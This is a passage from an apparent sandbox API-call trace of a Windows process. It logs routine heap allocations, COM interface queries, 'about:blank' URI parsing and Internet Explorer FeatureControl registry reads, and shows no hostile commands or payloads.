0x78fc18 [0066.091] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x78fc88 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x28) returned 0x77d278 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783670 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779378 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x7793c8 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x78fce0 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x64) returned 0x78fd48 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779418 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x78fdb8 
[0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xec) returned 0x78fe20 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779468 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x7794b8 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779508 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x78ff18 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x796000 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779558 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x7795a8 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x90) returned 0x796068 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x140) returned 0x796100 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x78bfd8 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x28) returned 0x77d2a8 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x783690 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xd0) returned 0x78cc90 [0066.094] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x38) returned 0x794d80 [0066.094] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x128) returned 0x796248 [0066.094] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x148) returned 0x796378 [0066.094] GetCurrentThreadId () returned 0x544 [0066.094] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x5c) returned 0x7964c8 [0066.094] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7836b0 [0066.094] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x33e76c | out: ppURI=0x33e76c*=0x78c42c) returned 0x0 [0066.095] IUri:GetPropertyDWORD (in: This=0x78c42c, uriProp=0x11, pdwProperty=0x33e754, dwFlags=0x0 | out: 
pdwProperty=0x33e754*=0x11) returned 0x0 [0066.095] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x7955f4, dwReserved=0x0 | out: ppSM=0x7955f4*=0x796530) returned 0x0 [0066.095] IInternetSecurityManager:SetSecuritySite (This=0x796530, pSite=0x7955fc) returned 0x0 [0066.095] IUnknown:AddRef (This=0x7955fc) returned 0x28 [0066.096] IUnknown:QueryInterface (in: This=0x7955fc, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33e724 | out: ppvObject=0x33e724*=0x795600) returned 0x0 [0066.096] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x796558 | out: ppvObject=0x796558*=0x0) returned 0x80004002 [0066.096] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x796554 | out: ppvObject=0x796554*=0x0) returned 0x80004002 [0066.096] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x796550 | out: ppvObject=0x796550*=0x0) returned 0x80004002 [0066.096] IUnknown:Release (This=0x795600) returned 0x0 [0066.096] 
IInternetSecurityManager:GetSecurityId (in: This=0x796530, pwszUrl="about:blank", pbSecurityId=0x33e7c0, pcbSecurityId=0x33e7b4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33e7c0*=0x61, pcbSecurityId=0x33e7b4*=0xf) returned 0x0 [0066.168] DllGetClassObject (in: rclsid=0x7922b4*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x33dd40*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33d3f8 | out: ppv=0x33d3f8*=0x75028c70) returned 0x0 [0066.168] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.169] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.169] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33dfbc | out: ppvObject=0x33dfbc*=0x75028c70) returned 0x0 [0066.169] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.169] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e17c | out: ppvObject=0x33e17c*=0x75028c7c) returned 0x0 [0066.169] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.169] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x783770, cchResult=0xc, pcchResult=0x33e1c4, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x33e1c4*=0xc) returned 0x0 [0066.169] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x790798 [0066.171] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.171] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790798 | out: hHeap=0x760000) returned 1 [0066.171] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.172] 
DllGetClassObject (in: rclsid=0x7922b4*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e090 | out: ppv=0x33e090*=0x75028c70) returned 0x0 [0066.172] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e17c | out: ppvObject=0x33e17c*=0x75028c7c) returned 0x0 [0066.172] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.172] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x783770, cchResult=0xc, pcchResult=0x33e1d4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33e1d4*=0x0) returned 0x800c0011 [0066.172] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.172] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.173] IUnknown:Release (This=0x78c42c) returned 0x2 [0066.173] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.173] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xf) returned 0x78bbb0 [0066.173] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bbe0 [0066.173] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x33e794, dwReserved=0x0 | out: ppSM=0x33e794*=0x798530) returned 0x0 [0066.174] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xf) returned 0x78bc28 [0066.174] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x79a678 [0066.174] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e944 | out: phkResult=0x33e944*=0x1b8) returned 0x0 [0066.174] RegOpenKeyExW 
(in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e948 | out: phkResult=0x33e948*=0x1c0) returned 0x0 [0066.174] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x33e904 | out: phkResult=0x33e904*=0x0) returned 0x2 [0066.174] RegOpenKeyExW (in: hKey=0x1b8, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x33e904 | out: phkResult=0x33e904*=0x0) returned 0x2 [0066.174] RegCloseKey (hKey=0x0) returned 0x6 [0066.174] RegCloseKey (hKey=0x0) returned 0x6 [0066.174] RegCloseKey (hKey=0x1b8) returned 0x0 [0066.175] RegCloseKey (hKey=0x1c0) returned 0x0 [0066.175] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x128) returned 0x79b738 [0066.175] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x79a6d0 [0066.175] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bc70 [0066.175] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x2000) returned 0x79b868 [0066.175] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x79d870 [0066.175] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x79d870 | out: hHeap=0x760000) returned 1 [0066.175] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.175] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x33e788 | out: ppURI=0x33e788*=0x78c42c) returned 0x0 [0066.176] DllGetClassObject (in: rclsid=0x7922b4*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e060 | out: ppv=0x33e060*=0x75028c70) returned 0x0 [0066.176] IUnknown:QueryInterface (in: This=0x75028c70, 
riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e14c | out: ppvObject=0x33e14c*=0x75028c7c) returned 0x0 [0066.176] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.176] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x783770, cchResult=0xc, pcchResult=0x33e194, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x33e194*=0xc) returned 0x0 [0066.176] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x790798 [0066.176] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.176] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790798 | out: hHeap=0x760000) returned 1 [0066.177] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.177] DllGetClassObject (in: rclsid=0x7922b4*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e060 | out: ppv=0x33e060*=0x75028c70) returned 0x0 [0066.177] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e14c | out: ppvObject=0x33e14c*=0x75028c7c) returned 0x0 [0066.177] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.177] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x783770, cchResult=0xc, pcchResult=0x33e1a4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33e1a4*=0x0) returned 0x800c0011 [0066.177] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.177] IUnknown:Release 
(This=0x75028c7c) returned 0x1 [0066.178] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.178] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.178] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.178] IUnknown:Release (This=0x78c42c) returned 0x2 [0066.179] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x2c) returned 0x77d998 [0066.179] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bca0 [0066.179] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x5c) returned 0x79d870 [0066.179] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.179] GetDeviceCaps (hdc=0x1b0101ce, index=88) returned 96 [0066.179] ReleaseDC (hWnd=0x0, hDC=0x1b0101ce) returned 1 [0066.179] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0066.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e9e0 | out: phkResult=0x33e9e0*=0x1bc) returned 0x0 [0066.180] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e9e4 | out: phkResult=0x33e9e4*=0x1c4) returned 0x0 [0066.180] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x33e9a0 | out: phkResult=0x33e9a0*=0x0) returned 0x2 [0066.180] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x33e9a0 | out: phkResult=0x33e9a0*=0x0) returned 0x2 [0066.180] RegCloseKey (hKey=0x0) returned 0x6 [0066.180] RegCloseKey (hKey=0x0) returned 0x6 [0066.180] RegCloseKey (hKey=0x1bc) returned 0x0 [0066.180] RegCloseKey (hKey=0x1c4) returned 0x0 [0066.180] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bcd0 [0066.229] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) 
returned 0x7795f8 [0066.229] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x5c) returned 0x79d8d8 [0066.230] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0066.230] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSRWLock") returned 0x77c78456 [0066.230] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockExclusive") returned 0x77c729f1 [0066.230] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockShared") returned 0x77c72560 [0066.230] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockExclusive") returned 0x77c729ab [0066.230] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockShared") returned 0x77c725a9 [0066.231] RtlInitializeConditionVariable () returned 0x79d90c [0066.231] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x34) returned 0x79d940 [0066.231] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x34) returned 0x79d980 [0066.231] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783770 [0066.231] IUnknown:AddRef (This=0x794ec0) returned 0x0 [0066.231] IUnknown:Release (This=0x794ec0) returned 0x1 [0066.231] IUnknown:Release (This=0x75028cb0) returned 0x1 [0066.231] IUnknown:QueryInterface (in: This=0x794ec0, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33f7ac | out: ppvObject=0x33f7ac*=0x794ec0) returned 0x0 [0066.232] IUnknown:Release (This=0x794ec0) returned 0x1 [0066.232] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x77d308 [0066.236] IUnknown_QueryService (in: punk=0x750296a4, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x794f18 | out: 
ppvOut=0x794f18*=0x0) returned 0x80004005 [0066.236] IUnknown:QueryInterface (in: This=0x750296a4, riid=0x773042d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33f728 | out: ppvObject=0x33f728*=0x750296b8) returned 0x0 [0066.237] IServiceProvider:QueryService (in: This=0x750296b8, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x794f18 | out: ppvObject=0x794f18*=0x0) returned 0x80004005 [0066.237] IUnknown:Release (This=0x750296b8) returned 0x1 [0066.237] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x34) returned 0x79d9c0 [0066.237] IInternetSecurityManager:SetSecuritySite (This=0x796530, pSite=0x7955fc) returned 0x0 [0066.237] IUnknown:Release (This=0x7955fc) returned 0x0 [0066.237] IUnknown:AddRef (This=0x7955fc) returned 0x28 [0066.237] IUnknown:QueryInterface (in: This=0x7955fc, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33f760 | out: ppvObject=0x33f760*=0x795600) returned 0x0 [0066.237] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x796558 | out: ppvObject=0x796558*=0x0) returned 0x80004002 [0066.237] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, 
[2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x796554 | out: ppvObject=0x796554*=0x0) returned 0x80004002 [0066.237] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x796550 | out: ppvObject=0x796550*=0x750296bc) returned 0x0 [0066.237] IUnknown:Release (This=0x795600) returned 0x0 [0066.237] CoTaskMemAlloc (cb=0x6d) returned 0x79da00 [0066.237] CoTaskMemAlloc (cb=0x9) returned 0x78bce8 [0066.237] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x78bd00 [0066.237] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x79da78 [0066.239] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0066.239] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x44) returned 0x779648 [0066.241] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x79dae8 [0066.241] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79db00 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4) returned 0x78c0a8 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x790658 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x79db18 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x94) returned 0x79ded0 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x34) returned 0x79df70 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x70) returned 0x79dfb0 [0066.307] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xf8) 
returned 0x79e028 [0066.307] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8b4) returned 0x79e128 [0066.307] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79db30 [0066.307] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.307] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79db48 [0066.307] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x84) returned 0x79e9e8 [0066.333] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x800) returned 0x79ea78 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x800) returned 0x79f280 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x4c) returned 0x79fa88 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x800) returned 0x79fae0 [0066.334] IsCharSpaceW (wch=0x48) returned 0 [0066.334] IsCharAlphaNumericW (ch=0x5c) returned 0 [0066.334] IsCharSpaceW (wch=0x5c) returned 0 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x18) returned 0x783790 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x7a02e8 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7837b0 [0066.334] IsCharSpaceW (wch=0x41) returned 0 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x79db60 [0066.334] IsCharAlphaNumericW (ch=0x20) returned 0 [0066.334] IsCharSpaceW (wch=0x20) returned 1 [0066.334] IsCharSpaceW (wch=0x7b) returned 0 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x790810 [0066.334] IsCharSpaceW (wch=0x20) returned 1 [0066.334] IsCharAlphaNumericW (ch=0x7b) returned 0 [0066.334] IsCharSpaceW (wch=0x62) returned 0 [0066.335] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a02e8 | out: hHeap=0x760000) returned 1 [0066.335] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.335] IsCharSpaceW (wch=0x3a) returned 0 [0066.335] RtlAllocateHeap 
(HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x790838 [0066.415] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.415] IsCharSpaceW (wch=0x75) returned 0 [0066.415] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.415] IsCharSpaceW (wch=0x28) returned 0 [0066.415] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.415] IsCharSpaceW (wch=0x23) returned 0 [0066.415] IsCharSpaceW (wch=0x23) returned 0 [0066.415] IsCharSpaceW (wch=0x7d) returned 0 [0066.415] IsCharAlphaNumericW (ch=0x7d) returned 0 [0066.415] IsCharSpaceW (wch=0x29) returned 0 [0066.415] IsCharSpaceW (wch=0x75) returned 0 [0066.415] IsCharSpaceW (wch=0x75) returned 0 [0066.415] IsCharSpaceW (wch=0x29) returned 0 [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7837f0 [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x34) returned 0x7a04f0 [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x774328 [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79db78 [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79db90 [0066.415] 